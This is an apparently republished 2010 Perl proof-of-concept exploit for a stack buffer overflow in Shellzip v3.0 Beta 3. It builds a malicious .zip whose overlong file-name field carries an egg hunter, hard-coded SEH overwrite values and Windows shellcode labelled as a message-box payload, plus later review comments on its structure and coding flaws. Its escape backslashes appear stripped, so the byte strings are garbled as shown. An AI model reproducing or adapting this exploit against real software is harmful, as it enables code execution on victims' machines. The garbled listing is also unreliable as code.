
# Title : Shellzip v3.0 Beta 3 (.zip) 0day Stack Buffer Overflow PoC exploit
# Published : 2010-05-16
# Author : Sud0


#***********************************************************************************
# Exploit Title : Shellzip v3.0 Beta 3 (.zip) 0day Stack Buffer Overflow PoC exploit
# Date          : 16/05/2010
# Author        : Sud0
# Bug found by  : Sud0
# Software Link : http://www.softsea.com/download/ShellZip.html 
# Version       :  3.0 Beta 3
# OS            : Windows
# Tested on     : XP SP3 En (VirtualBox)
# Type of vuln  : SEH
# Thanks to my wife for her support
# Greetz to: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.  
# If you do, Corelan cannot be held responsible for any damages this may cause.
#***********************************************************************************
#code :
# NOTE(review): the script never enables `use strict; use warnings;`, so a
# mistyped variable name would silently create a new global.
# Banner output. Each string ends in `|n` where a newline escape was intended;
# the backslashes appear to have been stripped when this listing was published,
# and the byte strings further down are affected the same way.
print "|------------------------------------------------------------------|n";
print "|                         __               __                      |n";
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |n";
print "|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |n";
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |n";
print "| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |n";
print "|                                                                  |n";
print "|                                       http://www.corelan.be:8800 |n";
print "|                                                                  |n";
print "|-------------------------------------------------[ EIP Hunters ]--|nn";
print "[+] Exploit for .... n";

# ZIP container records, in the order they are written to disk: local file
# header (PK\x03\x04 signature), central directory entry (PK\x01\x02) and
# end-of-central-directory record (PK\x05\x06). Counting each xNN token as one
# byte, they are 30, 46 and 22 bytes long, i.e. exactly the fixed-size part of
# each record, so the $payload written directly after the first two (see the
# final print) appears to occupy the entry's file-name field — it also ends in
# ".txt". From a defensive angle that is the observable anomaly in the resulting
# archive: a file-name field several kilobytes long.
# The "file size: don't change" remarks are the author's and mark the two
# 16-bit fields kept fixed.
my $ldf_header = "x50x4Bx03x04x14x00x00x00x00x00xB7xACxCEx34x00x00x00" .
"x00x00x00x00x00x00x00x00" .
"xe4x0f" .# file size: don't change
"x00x00x00";

my $cdf_header = "x50x4Bx01x02x14x00x14x00x00x00x00x00xB7xACxCEx34x00x00x00" .
"x00x00x00x00x00x00x00x00x00".
"xe4x0f". # file size: don't change
"x00x00x00x00x00x00x01x00".
"x24x00x00x00x00x00x00x00";

my $eofcdf_header = "x50x4Bx05x06x00x00x00x00x01x00x01x00".
"x12x10x00x00". # 
"x02x10x00x00". # 
"x00x00";

# Payload bytes, labelled "Corelan MsgBox" by the author. They are prefixed
# with the "w00tw00t" tag — presumably the marker the egg hunter ($egg, below)
# searches for, although the page does not say so explicitly. Nothing in this
# script verifies what the bytes do; treat them as an opaque, untrusted blob.
my $shellcode = "w00tw00t" . "xd9xebx9bxd9x74x24xf4x31xd2xb2x7ax31xc9x64x8b". 
"x71x30x8bx76x0cx8bx76x1cx8bx46x08x8bx7ex20x8b".
"x36x38x4fx18x75xf3x59x01xd1xffxe1x60x8bx6cx24".
"x24x8bx45x3cx8bx54x05x78x01xeax8bx4ax18x8bx5a".
"x20x01xebxe3x37x49x8bx34x8bx01xeex31xffx31xc0".
"xfcxacx84xc0x74x0axc1xcfx0dx01xc7xe9xf1xffxff".
"xffx3bx7cx24x28x75xdex8bx5ax24x01xebx66x8bx0c".
"x4bx8bx5ax1cx01xebx8bx04x8bx01xe8x89x44x24x1c".
"x61xc3xb2x08x29xd4x89xe5x89xc2x68x8ex4ex0exec".
"x52xe8x9cxffxffxffx89x45x04xbbx7exd8xe2x73x87".
"x1cx24x52xe8x8bxffxffxffx89x45x08x68x6cx6cx20".
"xffx68x33x32x2ex64x68x75x73x65x72x88x5cx24x0a".
"x89xe6x56xffx55x04x89xc2x50xbbxa8xa2x4dxbcx87".
"x1cx24x52xe8x5exffxffxffx68x6cx61x6ex58x68x63".
"x6fx72x65x31xdbx88x5cx24x07x89xe3x68x64x58x20".
"x20x68x6fx69x74x65x68x65x78x70x6cx31xc9x88x4c".
"x24x09x89xe1x31xd2x52x53x51x52xffxd0x31xc0x50".
"xffx55x08";

# Output archive name; a fixed literal, so the shell and open() calls at the end
# of the script never see external input.
my $filename="shellzip.zip";
# Egg hunter, alphanumeric-encoded with ESI as base register (author's note).
# Kept as an opaque string here; nothing on this page decodes it.
my $egg="VYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI56K1JjYoDOrbpRSZURrxxMtnWLgupZPtxoOH47Tp6Pd4nkyjnOQekZnOpuKWKOxgA";

# NOTE(review): $size is declared but never read — the same 4064 is repeated as
# a bare literal in the $payload line further down.
my $size = 4064;
# Align ESI to start of egghunter + Call ESI  (author's comment; the bytes
# after $egg are left undocumented on this page and are not annotated here)
my $junk = "AA". $egg ."A" x (224-length($egg))  . 
"x58x58x58" .
"x2Dx3Bx54x55x55".
"x2Dx3Bx54x55x55".
"x2Dx3Cx56x55x55".
"x50x5Ex53x58" . "x98x99";

$junk =$junk . "A" x( 288-length($junk)); # pad with "A" to a fixed 288-byte prefix

# SEH overwrite pair (see "Type of vuln : SEH" in the header). Both values are
# hard-coded addresses from the author's test VM ("XP SP3 En"); the page does
# not say which module they point into, so they are environment-specific.
my $nseh = "x74xA8x74x20";
my $seh = "x3Ex4Bx60x00";

# Assemble the over-long name field: 288 bytes of $junk, the two 4-byte SEH
# values, 25 bytes of "A", the shellcode, then "B" filler. The literal 4064
# duplicates $size; the -25 and -8 terms mirror the "A" x 25 padding and the
# two 4-byte SEH values, so everything before ".txt" totals exactly $size bytes.
# NOTE(review): if length($shellcode) ever exceeded the remaining budget the
# repeat count would go negative and "B" x (negative) yields "", silently
# producing a shorter payload with no error.
my $payload = $junk.$nseh.$seh . "A" x 25 . $shellcode . "B" x (4064-288-25-8-length($shellcode)). ".txt";    

print "Size : " . length($payload)."n";
print "Removing old $filename filen";
# NOTE(review): command line built by string interpolation and handed to the
# shell; "del" is a cmd.exe built-in, so this only works on Windows (consistent
# with "OS : Windows" in the header). $filename is a fixed literal, so there is
# no injection exposure here, but the return value is never checked.
system("del $filename");
print "Creating new $filename filen";
# NOTE(review): bareword filehandle, two-argument open with the mode embedded in
# the string, and no error check — perlcritic flags all three. The modern form
# is `open my $fh, '>', $filename or die "open $filename: $!";`.
open(FILE, ">$filename");

# Two copies of $payload are written: one after the local file header and one
# after the central-directory entry, followed by the end-of-central-directory
# record.
print FILE $ldf_header . $payload . $cdf_header . $payload . $eofcdf_header;
close(FILE); # return value unchecked; a buffered write error would be lost here